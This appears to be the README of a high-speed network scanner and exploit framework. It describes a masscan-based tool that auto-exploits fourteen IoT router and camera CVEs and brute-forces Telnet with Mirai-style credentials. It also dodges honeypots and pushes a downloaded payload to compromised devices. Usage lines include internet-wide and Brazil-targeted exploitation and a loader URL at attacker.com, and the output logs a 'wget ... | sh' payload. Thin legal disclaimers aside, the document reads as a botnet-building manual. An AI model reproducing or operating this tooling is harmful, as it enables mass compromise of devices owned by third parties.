A high-performance network scanner and exploit framework capable of scanning millions of IP addresses per second with built-in vulnerability detection and exploitation capabilities.
This tool is for educational and authorized security testing purposes only. Unauthorized scanning of networks or systems you do not own is illegal in most jurisdictions. Always obtain written permission before scanning any network. The authors assume no liability for misuse of this software.
- High-speed scanning: Up to millions of packets per second using PF_PACKET raw sockets
- BlackRock shuffle: Perfect bijective permutation ensures complete coverage without duplicates
- Multi-threaded: Scalable sender/receiver/exploit worker threads
- Honeypot detection: 512MB bitmap for tracking known honeypots and dynamic detection
- 14 exploit modules: Covers common IoT/network device vulnerabilities
- Global routable ranges: Built-in CIDR lists for scanning internet-facing devices
- Telnet brute-force: XOR-obfuscated credential list (Mirai-style)
- Dual output: TXT and JSON format results
- Rate limiting: Configurable PPS or bandwidth limits
- UDP/TCP support: SYN scan and UDP probe support
| Exploit | CVE/ID | Target Devices | Type |
|---|---|---|---|
| TP-Link | CVE-2023-1389 | TP-Link routers | RCE |
| Hikvision | CVE-2021-36260 | Hikvision cameras/NVRs | Command Injection |
| D-Link | CVE-2019-16920 | D-Link routers | Command Injection |
| Netgear | CVE-2020-35590 | Netgear routers | RCE |
| Zyxel | CVE-2020-9054 | Zyxel routers | RCE |
| Realtek | CVE-2014-8361 | Realtek UPnP devices | Command Injection |
| Cisco | CVE-2019-1663 | Cisco RV series routers | Buffer Overflow |
| GoAhead | CVE-2017-8225 | GoAhead web servers | Auth Bypass |
| MVPower | Backdoor | MVPower DVRs | Command Execution |
| Vacron | Vacron-NVR-RCE | Vacron NVRs | Command Injection |
| DVR-Hi3520 | XML NTP | Hi3520-based DVRs | XML Injection |
| Zhone | Zhone-RCE | Zhone routers | Command Injection |
| Fiber/GPON | Boa 0.93.15 | Fiber routers | Command Injection |
| Next.js | CVE-2025-55182/66478 | Next.js applications | Prototype Pollution RCE |
| Telnet | Brute-force | Various IoT devices | Credential Brute |
- OS: Ubuntu 18.04+ or Debian-based Linux
- Kernel: 3.14+ (for PACKET_QDISC_BYPASS support)
- CPU: Multi-core (more cores = better performance)
- RAM: Minimum 1GB (2GB+ recommended)
- Network: Gigabit NIC for high-speed scanning
- Root privileges: Required for raw packet operations
```bash
sudo apt update
sudo apt install -y build-essential git
sudo apt install -y linux-headers-$(uname -r)
```
2. Clone and Build
```bash
# Clone the repository
git clone https://github.com/your-repo/ultra-scanner.git
cd ultra-scanner

# Build with standard options
make

# For PF_RING Zero-Copy support (optional, requires PF_RING)
# make USE_PFRING_ZC=1 PFRING_DIR=/opt/pfring

# For debug build
# make DEBUG=1

# For static build
# make STATIC=1

# Strip binary (reduces size)
make strip

# Install to /usr/local/bin (optional)
sudo make install
```
3. Verify Build
```bash
./ultra_scanner -h
```
You should see the help message with all available options.
Quick Start
Basic Scan (Local Network)
```bash
# Scan your local network for open ports 80 and 443
sudo ./ultra_scanner -t 192.168.1.0/24 -p "80,443" -r 10000 -v
```
Global Internet Scan (Use Responsibly!)
```bash
# Scan global routable ranges for common IoT ports
sudo ./ultra_scanner --global -p "23,80,443,8080" -r 50000 -v
```
Scan with Exploitation
```bash
# Deploy a payload to vulnerable devices
sudo ./ultra_scanner -t 10.0.0.0/24 \
    -l http://your-server.com/payload.sh \
    -W 64 \
    -v
```
Brazil ASN Focus
```bash
# Target Brazilian IP ranges (useful for ISP routers)
sudo ./ultra_scanner --br -p "23,80,443" -r 100000 -v
```
UDP Scan
```bash
# UDP scan with custom probe
sudo ./ultra_scanner -t 192.168.1.0/24 -M udp -r 10000 -v
```
Dry Run (No Packets Sent)
```bash
# See what would be scanned without actually sending packets
sudo ./ultra_scanner --global --dump-ips > ips.txt
```
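A scope check for the dry-run list, added here as an example and not part of the project's code: it compares every dumped address against the CIDRs named in a written authorization and fails closed on anything outside them or unparseable. It assumes `--dump-ips` writes one IPv4 address per line (the page does not document the format); the scope file and the sample data are constructed.

```python
import bisect
import ipaddress
import sys

def load_scope(lines):
    """Parse authorized IPv4 CIDRs ('#' comments allowed) into sorted (first, last) ranges."""
    nets = []
    for raw in lines:
        entry = raw.split("#", 1)[0].strip()
        if entry:
            nets.append(ipaddress.IPv4Network(entry, strict=False))
    # collapse_addresses merges overlapping and adjacent networks.
    merged = sorted(ipaddress.collapse_addresses(nets))
    return [(int(n.network_address), int(n.broadcast_address)) for n in merged]

def check_targets(ip_lines, scope):
    """Return (out_of_scope, malformed) for a dumped target list."""
    starts = [first for first, _ in scope]
    out_of_scope, malformed = [], []
    for raw in ip_lines:
        text = raw.strip()
        if not text:
            continue
        try:
            addr = int(ipaddress.IPv4Address(text))
        except ipaddress.AddressValueError:
            malformed.append(text)  # unexpected line: report it, never skip silently
            continue
        # Rightmost range whose start is <= addr, then test its upper bound.
        i = bisect.bisect_right(starts, addr) - 1
        if i < 0 or addr > scope[i][1]:
            out_of_scope.append(text)
    return out_of_scope, malformed

# Constructed sample data (not output from the tool).
SAMPLE_SCOPE = ["192.168.1.0/24", "192.168.1.128/25", "10.0.0.0/30  # lab segment"]
SAMPLE_DUMP = ["192.168.1.5", "10.0.0.3", "10.0.0.4", "203.0.113.9", "not-an-ip", ""]

if __name__ == "__main__":
    # With two arguments: the scope file, then the file written by --dump-ips.
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as s, open(sys.argv[2]) as d:
            bad, junk = check_targets(list(d), load_scope(s))
    else:
        bad, junk = check_targets(SAMPLE_DUMP, load_scope(SAMPLE_SCOPE))
    print("out of scope:", bad, "unparseable:", junk)
    sys.exit(1 if bad or junk else 0)
```

A non-zero exit status means the target list must not be used as-is.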
Command Line Options
Targeting
| Option | Description | Example |
|---|---|---|
| `-t <cidr>` | Target CIDR range | `-t 192.168.1.0/24` |
| `--global` | Use built-in global routable ranges | `--global` |
| `--br` | Use Brazil ASN ranges | `--br` |
| `-w <file>` | Whitelist file (CIDRs) | `-w allow.txt` |
| `-b <file>` | Blacklist file (CIDRs) | `-b block.txt` |
| `--dump-ips` | Print IPs to scan and exit | `--dump-ips` |
Scan Configuration
| Option | Description | Example |
|---|---|---|
| `-p <ports>` | Ports to scan | `-p "80,443,8080-8090"` |
| `-r <pps>` | Packets per second | `-r 100000` |
| `-B <bps>` | Bandwidth limit | `-B 100M` |
| `-M <tcp\|udp>` | Scan method | `-M tcp` |
| `-i <iface>` | Network interface | `-i eth0` |
| `-S <ip>` | Source IP | `-S 192.168.1.100` |
| `-G <mac>` | Gateway MAC | `-G 00:11:22:33:44:55` |
| `-T <n>` | Sender threads | `-T 4` |
| `-R <n>` | Receiver threads | `-R 2` |
| `-c <secs>` | Cooldown after scan | `-c 10` |
| `-d` | Dry run (no packets) | `-d` |
| `--qdisc-bypass` | Bypass kernel qdisc | `--qdisc-bypass` |
Exploitation
| Option | Description | Example |
|---|---|---|
| `-l <url>` | Loader URL | `-l http://server/payload.sh` |
| `-W <n>` | Exploit worker threads | `-W 256` |
| `--scan-only` | Detect open ports only | `--scan-only` |
Output
| Option | Description | Example |
|---|---|---|
| `-o <file>` | TXT output file | `-o results.txt` |
| `-j <file>` | JSON output file | `-j results.json` |
| `-v` | Verbose mode | `-v` |
| `-q` | Quiet mode | `-q` |
| `-h` | Help | `-h` |
Performance Tuning
System Tuning for High-Speed Scanning
```bash
# Increase socket buffer sizes
sudo sysctl -w net.core.rmem_max=26214400
sudo sysctl -w net.core.wmem_max=26214400
sudo sysctl -w net.core.rmem_default=26214400
sudo sysctl -w net.core.wmem_default=26214400

# Disable reverse path filtering
# (this turns off the kernel's source-address validation on this host;
#  restore the previous value when the scan is finished)
sudo sysctl -w net.ipv4.conf.all.rp_filter=0
sudo sysctl -w net.ipv4.conf.default.rp_filter=0

# Increase network device backlog
sudo sysctl -w net.core.netdev_max_backlog=50000

# Disable TCP timestamps (reduces overhead)
sudo sysctl -w net.ipv4.tcp_timestamps=0

# Make changes permanent (add to /etc/sysctl.conf)
```
Rate Recommendations
| Network Type | Recommended PPS | Notes |
|---|---|---|
| Home/Lab | 5,000 - 20,000 | Safe for home networks |
| Office/Corporate | 20,000 - 50,000 | Monitor network load |
| Datacenter (1Gbps) | 100,000 - 500,000 | May need tuning |
| Datacenter (10Gbps) | 500,000 - 2,000,000 | Requires PF_RING |
CPU Affinity
The scanner automatically pins threads to CPU cores. For optimal performance:
- More sender threads = more cores
- 1 receiver thread is usually sufficient
- Exploit workers can be scaled based on targets
Output Formats
TXT Output Example
```text
2025-03-31 10:15:23 | 192.168.1.100:80 | TP-Link | CVE-2023-1389 | TP-Link locale RCE | HTTP 200 | VERIFIED | 342ms
2025-03-31 10:15:24 | 192.168.1.101:23 | Telnet | TELNET-BRUTE | Telnet RCE via credential brute-force | VERIFIED | 156ms
```
JSON Output Example
```json
[
  {
    "timestamp": "2025-03-31 10:15:23",
    "ip": "192.168.1.100",
    "port": "80",
    "device": "TP-Link",
    "cve": "CVE-2023-1389",
    "method": "TP-Link locale RCE",
    "payload": "wget http://server/payload.sh -O- | sh",
    "status_code": 200,
    "success": true,
    "verified": true,
    "is_honeypot": false,
    "time_ms": 342,
    "response_preview": "HTTP 200"
  }
]
```
Honeypot Detection
The scanner uses multiple methods to avoid honeypots:
- Static CIDR list: Known honeypot IP ranges (MHN, T-Pot, DShield)
- Dynamic detection: HTTP headers and body patterns
- Bitmap tracking: 512MB bitmap for marking identified honeypots
- Telnet behavior: If any credential works, marks as honeypot
Architecture
```text
┌─────────────────────────────────────────────────────────┐
│                       Main Thread                       │
│  - Parse arguments                                      │
│  - Initialize subsystems                                │
│  - Setup BlackRock permutation                          │
└────────────┬────────────────────────────────┬───────────┘
             │                                │
    ┌────────▼────────┐              ┌────────▼────────┐
    │ Sender Threads  │              │ Receiver Threads│
    │  (PF_PACKET)    │              │  (PF_PACKET)    │
    │  - BlackRock    │              │  - SYN+ACK      │
    │  - Rate limit   │───Packets───▶│  - Cookie check │
    │  - UDP/TCP      │              │  - De-dup       │
    └─────────────────┘              └────────┬────────┘
                                              │
                                    ┌─────────▼─────────┐
                                    │   Target Queue    │
                                    │   (MPMC ring)     │
                                    └─────────┬─────────┘
                                              │
                                    ┌─────────▼─────────┐
                                    │  Exploit Workers  │
                                    │ - Telnet brute    │
                                    │ - 14 exploit mods │
                                    └─────────┬─────────┘
                                              │
                                    ┌─────────▼─────────┐
                                    │   Output Writer   │
                                    │   (TXT + JSON)    │
                                    └───────────────────┘
```
Common Use Cases
1. Vulnerability Assessment
```bash
# Scan corporate network for vulnerable IoT devices
sudo ./ultra_scanner -t 10.0.0.0/8 -p "23,80,443,8080,8443" -r 20000 -v
```
2. Penetration Testing
```bash
# Full scan with exploitation
sudo ./ultra_scanner -t 192.168.1.0/24 \
    -l http://attacker.com/payload \
    -W 128 \
    -o vuln_hosts.txt \
    -j vuln_hosts.json \
    -v
```
3. Internet Census (Research Only)
```bash
# Scan global routable ranges for open SSH
sudo ./ultra_scanner --global -p "22" -r 100000 -v
```
4. ISP Router Assessment
```bash
# Focus on Brazil ranges for router vulnerabilities
sudo ./ultra_scanner --br -p "23,80,443,7547,37215" -r 50000 -v
```
Troubleshooting
Error: "Cannot determine source IP"
```bash
# Specify interface and IP manually
sudo ./ultra_scanner -i eth0 -S 192.168.1.100 -t 10.0.0.0/24
```
Error: "Interface not found"
```bash
# List available interfaces
ip link show

# Use correct interface name (ens33, enp0s3, etc.)
sudo ./ultra_scanner -i ens33
```
Low packet send rate
```bash
# Increase sender threads
sudo ./ultra_scanner -T 8 -r 100000

# Enable QDISC bypass (if supported)
sudo ./ultra_scanner --qdisc-bypass -r 200000
```
Segmentation fault
```bash
# Compile with debug symbols
make clean && make DEBUG=1

# Run with address sanitizer
./ultra_scanner [options]
```
No responses received
```bash
# Check that you're scanning reachable IPs
# Verify source MAC is correct
# Check if gateway MAC is being resolved
# Try with verbose mode to see what's happening
sudo ./ultra_scanner -t 192.168.1.0/24 -v
```
Security Considerations
- Never scan without permission - This is illegal in most jurisdictions
- Use on networks you own or have written authorization for
- The loader URL should host your own payloads - Don't use third-party URLs
- Logs may contain sensitive information - Handle output files securely
- Honeypots may log your activity - Be aware of detection capabilities
- High-rate scanning may trigger IDS/IPS - Use appropriate rates for the environment
Advanced Configuration
Custom Probe Payload (UDP)
Modify config.h to add a custom UDP probe:
```c
// In config.h, add probe payload
uint8_t probe_payload[] = "GET / HTTP/1.0\r\n\r\n";
size_t probe_payload_len = sizeof(probe_payload) - 1;
```
Add Custom Exploit Module
1. Add detection function in exploits.c
2. Add exploit function in exploits.c
3. Register in main.c register_exploits()
4. Add to exploit table
Modify Port List
Edit DEFAULT_PORTS in config.h:
```c
#define DEFAULT_PORTS "80,443,8080,8443,23,2323,22"
```
Building with PF_RING
For maximum performance (2M+ pps):
```bash
# Install PF_RING (from https://github.com/ntop/PF_RING)
cd /opt
git clone https://github.com/ntop/PF_RING.git
cd PF_RING
make
cd kernel
sudo make install
sudo depmod -a
sudo modprobe pf_ring

# Build scanner with PF_RING
make USE_PFRING_ZC=1 PFRING_DIR=/opt/PF_RING
```
License
This project is for educational purposes only. Use at your own risk.
Acknowledgments
- Based on masscan by Robert David Graham
- BlackRock2 implementation from masscan
- Telnet brute-force adapted from Mirai scanner
- Exploit modules from various security research

Support
For issues or questions:
- Check the troubleshooting section
- Run with -v for verbose output
- Compile with DEBUG=1 for detailed debugging